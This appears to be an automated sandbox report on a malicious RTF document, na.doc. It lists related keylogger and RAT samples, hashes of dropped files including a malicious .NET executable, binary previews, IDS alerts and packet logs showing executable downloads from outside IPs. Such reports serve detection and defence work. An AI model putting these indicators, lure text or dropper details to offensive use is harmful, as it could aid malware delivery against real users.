                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.97.3
                                                                                                          Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.97.3
                                                                                                          Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 188.114.97.3
                                                                                                          AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.97.3
                                                                                                          0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.97.3
                                                                                                          1.rtfGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.97.3
                                                                                                          ingswhic.docGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.97.3
                                                                                                          36f7277af969a6947a61ae0b815907a1na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:@...e...........................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pgTQ4mfZBbJhpdd[1].exe

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):787456
                                                                                                          Entropy (8bit):7.709559068126749
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:1kMFRld9Q5ywShxZ0RDj42YVYMmOlO1Zz8esFQKayk4TQyruH1QhLrc:PFj1xZ0RD9RMmOPBk4TJryZ
                                                                                                          MD5:F395BAA43F62DF879CA3F4810ECDCFB8
                                                                                                          SHA1:B1DAF99EFE077B4236CEAE5D8DCF16B34DDCACB9
                                                                                                          SHA-256:8C6423A9CD8C3E559AB0992A29AC4D82EBBE32BFB4923DD45EF57B1AE95AA8C0
                                                                                                          SHA-512:619A45885243632AB4FBE32A81EA5E5283BD390E485635E4308D74FF36E59AEDE27AAE1058BE29FF00C38E114254953FE21D5333163012657253863F64BAC2F3
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                          Reputation:low
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.................0.................. ... ....@.. .......................`............@.................................n...O.... .......................@..........p............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........u...i......^...@...X............................................0...........(........(....}.......&....*....................0............{.....+..*.0..%..........{.....o....(.......&.r...ps....z.*....................0..)...........(......,...(....}......{.......&....*..........."#.......0..E..........{......o .......{....(......,...(....}.....{........{.......&....*...........>?.......0...........s!......b...%..,...(....rO..p~....("...s#....+|..o$......o%.......(...+

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C8D4FE31-9F48-4FB4-B754-25CCD1B40900}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16384
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3::
                                                                                                          MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{76C96E95-9EA6-410E-91E3-400D325380BE}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1536
                                                                                                          Entropy (8bit):1.3586208805849456
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbt:IiiiiiiiiifdLloZQc8++lsJe1MzO
                                                                                                          MD5:F4DDA5BD51852967A9BEF0076BA2EF66
                                                                                                          SHA1:48C039143403A1A42101A92897F32D3919B76853
                                                                                                          SHA-256:B0161F2031A1FC9AAB1D56F6731A2A8BFB0D11CA4F70A60C01A6DE75DB64EA84
                                                                                                          SHA-512:2FD184875DD8E0FF2A4AA825A89AFE72D9FCD85EB52EC717AD20F7E1BE8223E59ADACC9D7747C82B3EEEC311F45938FC3189BE59A82D1D91076654C8934F996E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8FEE9B89-F0FF-409D-80D0-E8095DD9B851}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1024
                                                                                                          Entropy (8bit):0.05390218305374581
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                          Malicious:false
                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C4625A07-4367-4C7D-ACB3-A1CE78C00A74}.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:tar archive (old), type '8' H, mode 6, uid d, gid v, seconds H
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064378
                                                                                                          Entropy (8bit):3.4029233117231206
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:dyemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryeP:XoUVM
                                                                                                          MD5:1DEA66ED74BDD066F06262E119BB1641
                                                                                                          SHA1:71912293B126806246AE64BD3EFCCD8B367869CD
                                                                                                          SHA-256:9974D561926F295ADC974C7527C5754BAACC2498648917F75882FA5232FCDEE5
                                                                                                          SHA-512:233D673B1B1E3F00C861769CFF6A7D0A09C320668C28C697DF6428DAA6D1B62D39AFFA42C45A50163CD084C9930742FF0B413F0AEE523279078338F85C87E33D
                                                                                                          Malicious:false
                                                                                                          Preview:H.x.a.L.A.e.l.O.W.I.x.f.O.o.H.N.T.B.W.j.S.O.e.M.i.N.b.4.B.S.F.l.S.q.i.e.D.Y.r.g.t.N.4.J.W.G.F.L.t.x.6.H.u.i.d.c.K.Q.v.g.V.y.A.V.g.n.t.2.H.h.U.d.X.v.0.k.U.W.8.p.0.s.V.b.G.a.A.U.K.W.L.J.3.6.W.C.G.y.e.u.7.j.f.A.i.6.H.P.3.C.y.j.7.5.G.8.I.h.G.t.0.p.M.L.a.V.L.m.T.W.X.g.W.K.R.A.i.5.Q.g.0.y.l.y.U.l.u.G.m.h.y.j.d.W.X.D.t.o.d.9.a.b.4.l.H.8.q.Y.o.0.z.z.7.U.Z.R.P.2.x.O.U.E.J.t.W.j.M.J.l.h.S.C.s.M.m.Y.9.n.t.E.I.2.U.j.B.P.Q.3.9.5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... .j,'.j...CJ..OJ..QJ..U..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ...CJ..OJ..QJ..^J..aJ....6..

                                                                                                          C:\Users\user\AppData\Local\Temp\ew5u42cy.3e1.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Local\Temp\gzb5uyex.xhe.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:Generic INItialization configuration [folders]
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38
                                                                                                          Entropy (8bit):4.195295934496219
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:M19m42Uv:M9
                                                                                                          MD5:85AFAECA1F119568BFA70BB4ED76F108
                                                                                                          SHA1:13DA0EB4D0361D0A4CD1DD38DBECA56DEB273457
                                                                                                          SHA-256:3211DF2212BAF22DF462140F37EC16A81483BFB4DE4796F24A0708390601F0F8
                                                                                                          SHA-512:4E5C577D753BF15471DA27D3EEE34FCE86E388414FA1177E3BCF877827C82750F23C8EDB64B83CF7E55C69D5FCB2BD18941E81A353F8458A0685D358C1E9D3A6
                                                                                                          Malicious:false
                                                                                                          Preview:[doc]..na.LNK=0..[folders]..na.LNK=0..

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\na.LNK

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:12 2023, mtime=Fri Aug 11 15:42:12 2023, atime=Wed Oct 30 06:31:53 2024, length=1875360, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):968
                                                                                                          Entropy (8bit):4.534311848173169
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:8Rvt6E0gXg/XAlCPCHaXXzB4vmgB/Pr+X+WrI2Nmicvb2grI8DtZ3YilMMEpxRlC:8RFvk/XTHzS1syweDrDDv3qmi57u
                                                                                                          MD5:BDE5F624437A91292D6DAA374113BD4A
                                                                                                          SHA1:A6B763CCF4CED53E4F5D54316754A1F425CD8178
                                                                                                          SHA-256:CF69AB77994489DB1F991169B143856FAA7DE164EDDDF1853B90B01CF3D435B6
                                                                                                          SHA-512:DAAC2685783FF506A33A46C9C28CCC19EDBA0F48C444C657AE3CD45DD8D0D8170593C57B7D639BA63592092B35632BF5AC556DE377B8319BFC27FC10C1D8259A
                                                                                                          Malicious:false
                                                                                                          Preview:L..................F.... ....Cv.r....Cv.r.......*...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....^Y.;..user.8......QK.X^Y.;*...&=....U...............A.l.b.u.s.....z.1......WH...Desktop.d......QK.X.WH.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....P.2.....^Y.; .na.doc..:.......WG..WG.*.........................n.a...d.o.c.......p...............-...8...[............?J......C:\Users\..#...................\\610930\Users.user\Desktop\na.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.n.a...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......610930..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8...8.....[....

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):162
                                                                                                          Entropy (8bit):2.479760646202031
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vrJlaCkWtVySKybVKyz2wG/3WWFKbillfGjHV/ln:vdsCkWt7Kyk5wG7KGlWdl
                                                                                                          MD5:173B821D86C2B60479B0ABD9E1526A13
                                                                                                          SHA1:F998D8E72EDD222597770F33AC964A833AE39130
                                                                                                          SHA-256:3848DF7F919BB1B6E681580A595ACECB839E9E7AF8C489C114C8A010062742FB
                                                                                                          SHA-512:ECA636CFE260B66B7880844611DBBFB771770D03A343E008154DCE4BA2F6BE37967FFDA8B22CE9B4BCA7392E86C57289673A9B847C52A12920CF610BF40DACA8
                                                                                                          Malicious:false
                                                                                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2
                                                                                                          Entropy (8bit):1.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Qn:Qn
                                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                          Malicious:false
                                                                                                          Preview:..

                                                                                                          C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):787456
                                                                                                          Entropy (8bit):7.709559068126749
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:1kMFRld9Q5ywShxZ0RDj42YVYMmOlO1Zz8esFQKayk4TQyruH1QhLrc:PFj1xZ0RD9RMmOPBk4TJryZ
                                                                                                          MD5:F395BAA43F62DF879CA3F4810ECDCFB8
                                                                                                          SHA1:B1DAF99EFE077B4236CEAE5D8DCF16B34DDCACB9
                                                                                                          SHA-256:8C6423A9CD8C3E559AB0992A29AC4D82EBBE32BFB4923DD45EF57B1AE95AA8C0
                                                                                                          SHA-512:619A45885243632AB4FBE32A81EA5E5283BD390E485635E4308D74FF36E59AEDE27AAE1058BE29FF00C38E114254953FE21D5333163012657253863F64BAC2F3
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.................0.................. ... ....@.. .......................`............@.................................n...O.... .......................@..........p............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........u...i......^...@...X............................................0...........(........(....}.......&....*....................0............{.....+..*.0..%..........{.....o....(.......&.r...ps....z.*....................0..)...........(......,...(....}......{.......&....*..........."#.......0..E..........{......o .......{....(......,...(....}.....{........{.......&....*...........>?.......0...........s!......b...%..,...(....rO..p~....("...s#....+|..o$......o%.......(...+

                                                                                                          C:\Users\user\Desktop\~$na.doc

                                                                                                          Download File
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):162
                                                                                                          Entropy (8bit):2.479760646202031
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vrJlaCkWtVySKybVKyz2wG/3WWFKbillfGjHV/ln:vdsCkWt7Kyk5wG7KGlWdl
                                                                                                          MD5:173B821D86C2B60479B0ABD9E1526A13
                                                                                                          SHA1:F998D8E72EDD222597770F33AC964A833AE39130
                                                                                                          SHA-256:3848DF7F919BB1B6E681580A595ACECB839E9E7AF8C489C114C8A010062742FB
                                                                                                          SHA-512:ECA636CFE260B66B7880844611DBBFB771770D03A343E008154DCE4BA2F6BE37967FFDA8B22CE9B4BCA7392E86C57289673A9B847C52A12920CF610BF40DACA8
                                                                                                          Malicious:true
                                                                                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (65311), with CR line terminators
                                                                                                          Entropy (8bit):4.403193477434731
                                                                                                          TrID:
                                                                                                          • Rich Text Format (4004/1) 100.00%
                                                                                                          File name:na.doc
                                                                                                          File size:1'875'360 bytes
                                                                                                          MD5:991c3ef3605df4ffc60c31c48747fec9
                                                                                                          SHA1:723ebd382ae7f1d0a12aa4dc8f63885814ec7bbf
                                                                                                          SHA256:71c7ce3ae15af93c31891bfb40543074c2ea5a51f34ff3c13e52c68d1e020053
                                                                                                          SHA512:405976d7d3f24e2bc005b936281a045c4313ebea994e482a5a1624d3ff51d392b55eb15e20286943aabba707308ccb8190609f7c4dc7ebecc1cb79735012c102
                                                                                                          SSDEEP:6144:ywAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAQ:x9
                                                                                                          TLSH:F495C62DD34B02598F620377AB571E5142BDBA7EF38552A1302C537933EAC3DA1252BE
                                                                                                          File Content Preview:{\rt..{\*\i5HxaLAelOWIxfOoHNTBWjSOeMiNb4BSFlSqieDYrgtN4JWGFLtx6HuidcKQvgVyAVgnt2HhUdXv0kUW8p0sVbGaAUKWLJ36WCGyeu7jfAi6HP3Cyj75G8IhGt0pMLaVLmTWXgWKRAi5Qg0ylyUluGmhyjdWXDtod9ab4lH8qYo0zz7UZRP2xOUEJtWjMJlhSCsMmY9ntEI2UjBPQ395}..{\334702368please click Enable

                                                                                                          File Icon

                                                                                                          Icon Hash:2764a3aaaeb7bdbf

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-10-30T08:32:00.624202+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1187.120.84.3880192.168.2.2249164TCP
                                                                                                          2024-10-30T08:32:00.968097+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2187.120.84.3880192.168.2.2249164TCP
                                                                                                          2024-10-30T08:32:10.430131+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249165132.226.8.16980TCP
                                                                                                          2024-10-30T08:32:11.662175+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249165132.226.8.16980TCP
                                                                                                          2024-10-30T08:32:12.249570+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249167188.114.97.3443TCP
                                                                                                          2024-10-30T08:32:14.061495+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249168132.226.247.7380TCP
                                                                                                          2024-10-30T08:32:16.278047+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249170132.226.8.16980TCP
                                                                                                          2024-10-30T08:32:18.179924+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249172158.101.44.24280TCP
                                                                                                          2024-10-30T08:32:18.778451+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249173188.114.96.3443TCP
                                                                                                          2024-10-30T08:32:20.514930+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249175188.114.97.3443TCP
                                                                                                          2024-10-30T08:32:24.879520+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249179188.114.97.3443TCP
                                                                                                          2024-10-30T08:32:28.926211+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249181188.114.97.3443TCP

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 30, 2024 08:31:59.658689022 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:31:59.670018911 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:31:59.670115948 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:31:59.670418978 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:31:59.681166887 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.624047041 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.624128103 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.624140024 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.624151945 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.624165058 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.624171972 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.624187946 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.624201059 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.624201059 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.624202013 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.624212980 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.624214888 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.624223948 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.624228954 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.624241114 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.624250889 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.624269962 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.624284983 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.629715919 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.629781961 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.629790068 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.629831076 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.630048037 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.630062103 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.630088091 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.630100965 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.796164989 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.796186924 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.796199083 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.796211004 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.796221972 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.796241045 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.796257019 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.796264887 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.796504021 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.796519995 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.796525955 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.796531916 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.796544075 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.796567917 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.797439098 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.797451019 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.797461033 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:00.797467947 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.797481060 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:00.797501087 CET4916480192.168.2.2287.120.84.38
